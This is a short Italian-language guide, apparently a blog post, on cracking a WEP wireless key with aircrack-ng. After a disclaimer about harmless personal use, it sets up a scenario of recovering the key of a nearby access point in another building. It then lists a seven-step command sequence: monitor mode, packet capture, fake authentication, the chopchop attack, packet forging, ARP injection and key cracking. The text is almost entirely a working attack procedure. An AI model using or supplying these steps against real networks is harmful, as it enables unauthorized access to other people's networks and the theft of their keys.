L’ hacking wireless è diventata una disciplina molto importante nel mondo del wifi, conoscere le security gap della propria rete è fondamentale. Le tecniche utilizzate possono risulatare armi molto pericolose e per questo vorrei sottolineare che questa piccola guida deve essere utilizzata solo per scopi personali non nocivi. Ipotizziamo adesso una situazione del genere: siamo in una zona Alfa dove il nostro terminale riesce a ricevere il segnale dall’ Access Point (essid: Rambo) presenti nel famoso palazzo Aramzec del quartiere Calamzul. Una della tante soluzioni per ottenere la chiave è quella di eseguire l’ attacco 4:
1 – airmon airmon-ng start <wifi_interface> (modalità promisqua)
2- airodump-ng <wifi_interface> -w <ESSID> –bssid <MAC_AP> -c <channel> (sondare le reti, data (ivs))
3 – aireplay-ng -1 6000 -e <ESSID> -h <MY_MAC> -q 10 -o 1 <wifi_interface> (keep alive)
4 – aireplay-ng -4 -e <ESSID> <wifi_interface> (è necessario almeno 1 data + comunicazione con AP=deve essere presente uno autenticato – limite teorico) – creo un file xor necessario per creare il mio ARPpacket
5 – packetforge-ng -0 -a <MAC_AP> -h <MY_MAC> -k 255.255.255.255 -l 255.255.255.255 -y <file.xor_creato_al_punto_4> -w <nome_file_pack_ARP> <wifi_interface> (creazione del packetto verace)
6 – aireplay-ng -2 -r <nome_file_pack_ARP> <wifi_interface> (ARP injection)
7- aircrack-ng -z <nome_file.cap> (crack vero e proprio con algoritmo z performante, è di default)
Ed ecco che il risultato di tutto si risolve in KEY FOUNDED!!
